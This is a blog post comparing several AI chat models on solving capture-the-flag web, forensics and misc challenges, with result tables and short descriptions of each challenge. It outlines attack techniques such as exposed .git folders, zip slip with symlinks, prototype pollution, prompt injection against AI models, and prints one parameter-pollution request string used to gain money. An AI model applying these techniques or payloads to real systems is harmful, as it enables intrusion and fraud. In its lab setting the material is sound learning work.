I really like using Large Language Models (LLMs). One of my uses for them is solving CTFs.
Recently I started comparing a couple of them, especially since there have been some major updates lately.
I was curious and wanted to create a table that would compare their capabilities in solving CTFs. My significant other then asked me why not write an article about it, so here we are😉.
I read some opposing views towards using LLMs for CTFs. However, for me, using them is the same as googling and searching the web for learning, and trying to find answers to challenges or tasks we have. If we had the option to use google much more efficiently and find the results we want right away, I believe most of us would do that.
Some people may say that LLMs solve the challenges for us, unlike searching the web, and some of that is true, but not always.
I would divide it into two situations:
When we are focusing on getting points or solving tasks: In this case, I see no problem with using all the tools we have in order to be the most efficient and do what we want in the fastest way possible.
When we want to learn and understand how to do things: From my experience, often (or even the vast majority of times), the answer is not presented right away and I think that:
By getting the LLM output and the results, we also learn by reading the solution.
We still think and learn because a lot of times the LLM gives us only leads and we have to test them and continue using the hints and leads we have received. So we will still try to solve the challenges on our own.
Sometimes we simply request the model to explain a code snippet, a certain technology, etc., and not really ask it to solve the challenge.
The Models I Used
Some of the top and most interesting LLMs that I was familiar with include:
OpenAI GPT 4.0
Claude 3 Opus
Google Gemini Pro 1.5
Pi - Inflection-2.5
There are some additional LLMs that I did not test or partially tested. For example:
Microsoft Copilot, since it uses GPT 4.0 and this model is already part of the comparison, so I assumed there should be no major differences.
Some LLMs that were just not good enough.
Google Gemini Ultra 1.0 which should be Google's best model and requires a monthly payment. It is impossible to work with because the security mechanism stops conversations or deletes links many times. It is a bummer since I believe Gemini could help a lot. Here are some of its behaviors:
The Comparison
The following table shows which LLMs succeeded in solving the different challenges.
A couple of notes:
The results combine which LLMs succeeded in solving the challenges and how many prompts (hits) it took. The main goal was to understand which model is the best for CTF competitions.
I usually sent the same prompt to all the LLMs, including the CTF description, any provided files or code, and my request. Also, I gave each of them a similar number of attempts before considering the result as failed.
The challenges I used for comparison came from different CTFs, which I had already solved or had solutions for. They were mainly Web and Forensics challenges, because these are the categories I usually focus on, but I know it is possible to solve or get help for other categories as well.
I will provide a general description and notes for each challenge in the section following the table.
GPT 4.0 | Claude Opus | Gemini Pro 1.5 | Pi 2.5 | |
.git Challenge | 1 hit (.git and Directory Brute Forcing) | Directory Brute Forcing | Directory Brute Forcing | Directory Brute Forcing |
Secret PNG in PDF | 3 hits | 3 hits |
| 3 hits -instructed to extract only JPEG |
Zip Slip Symlink | 1 hit | 1 hit | 1 hit | |
JS/LocalStorage Manipulation | 1 hit | 1 hit | 1 hit | 1 hit |
Prototype Pollution | Only identified | 5 hits - almost exploited | Only identified | Only identified |
Parameter Pollution | 2 hits | 1 hit | ||
Message in RGB Values | 3 hits | |||
LLM Token IDs | Suggested other models | |||
Hidden Data in ShellBags | 1 hit | |||
Prompt Injection #1 | 5 hits | 2 hits | 5 hits | |
Prompt Injection #2 | 7 hits | 5 hits |
Challenges Descriptions for Reference (skip to conclusions if desired)
.git challenge - There is only access to a simple website. The solution is downloading the .git folder and searching for the flag in previous commits.
Secret PNG in PDF - A PDF file contains a secret PNG with the flag but does not display it.
Zip Slip Symlink - A website with the functionality of uploading a ZIP file, extracting it and reading the extracted files. The solution is to upload a ZIP file of a Symbolic link, pointing to the flag's location.
Simple JS/LocalStorage Manipulation - A button that needs to be pressed a many times to reveal the flag and the clicks are stored in the LocalStorage. Everything is on the client side.
Prototype Pollution - A website containing two main functionalities. Claude Solution (the correct solution is without "secret"):
6. Parameter Pollution - A website that allows registering, login, and donating money. As a user, you start with $1000, and can only donate to Jeff Bezos, not other users. The goal is to gain more than a certain amount of money to obtain the flag.
The solution was to create a couple of users and send money to one of them using:
to=lisanalgaib&to=orel¤cy=1000
7. Message in RGB Values - The challenge provided a small square image with random colors in each pixel:
The solution is to take each pixel's RGB values, combine them and convert to ascii which will result in a message containing the flag.
Note: all the tested LLMs mentioned solutions related to RGB values but only ChatGPT suggested to sum them.
8. LLM Token IDs - For this challenge we were provided with LLM tokens: [2864, 35, 1182, 37, 90, 28936, 8401, 821, 2957, 5677, 265, 7037, 40933, 29415, 92].
The solution was to find the correct model that translates these tokens to the flag.
While ChatGPT didn't solve it, it suggested trying different models and understood it needs to be translated to words/the flag.
For some reason Claude acted like GPT 3.5 and was sure that the flag is UMDCTF{hackerman}
Gemini 1.5 went too far and suggested unrelated solutions.
And Pi was sure the flag is UMDCTF{DontUnderestimateVladimirHarkonnen} 🤦🏻♀️
9. Hidden Data In ShellBags - The challenge provided a VDI file and we had to find some deleted information that still exists in ShellBags (https://www.hackingarticles.in/forensic-investigation-shellbags/).
Gemini was the only one that suggested a correct and a quick solution.
Claude was pretty close but its solution did not work for me.
10. Prompt Injection - The LLM should not generate any code.
Claude Opus did not want to help because of unethical hacking reasons.
11. Prompt Injection - The LLM should not display the password.
Claude Opus did not want to help because of unethical hacking reasons.
Conclusions and Final Thoughts
In conclusion, here are the results (excluding the partial solutions):
Model | Number of Successes | Web Challenges | Forensics Challenges | Misc Challenges |
GPT 4.0 | 7 | 3/4 | 3/4 | 1/3 |
Claude Opus | 5 | 4/4 | 1/4 | 0/3 |
Gemini Pro 1.5 | 4 | 1/4 | 1/4 | 2/3 |
Pi 2.5 | 4 | 2/4 | 0/4 | 2/3 |
General Impression
The top models I have found to be the most intelligent were GPT 4.0 and Claude Opus.
There are two main disadvantages of Claude compared to ChatGPT:
The fact that sometimes it will not help with prompts it perceives as malicious.
Its inability to run code, which limits its capabilities and sometimes leads to nonsense outputs (similar to GPT 3.5).
Moreover, it seems to me that GPT 4.0 is slightly better. There are times when it understands the context better and mentions one small additional piece of information that makes a huge difference.
There are some tasks that Gemini was really good with (it is also very good with summarizing the results, the leads and next steps), but in general it is not good enough, especially when comparing to GPT and Claude.
I really wish I could use Gemini Ultra for this for this, but its limitation makes it irrelevant.
Although Pi 2.5 is perceived as less intelligent than the others (by intelligence, I mainly mean understanding and staying in context, having sufficient data, and solving the task), there were times it provided surprisingly helpful outputs, sometimes even more than other models.
Performance By Category
ChatGPT's results with web and forensics challenges are very good. I believe its poor score in the misc category was due to not trying enough challenges in this category, and because two of the three misc challenges were related to prompt injection, which it seems it is really bad with.
I actually believe ChatGPT should be good with misc challenges since it has an advantage as it can run and generate pretty good code as I saw in other challenges not mentioned in this article.
Claude performed VERY well with the web challenges but quite poor with the forensics challenges. One reason for its poor score in the misc category is its refusal to help with prompts considered malicious (the prompt injection challenges).
Gemini and Pi had about the same results across all of categories, so no special comments for them.
I hope you enjoyed reading.
Feel free to contact me if you have further insights, different opinions, or anything else.
Orel 🕵🏻♀️
Really very thorough article and the kind of question and comparison every CTF player had in mind. I don't think I've come acrross an article that addressed those curious questions and compared the LLMs side by side for the benefit of CTF play and learning. Kudos to you!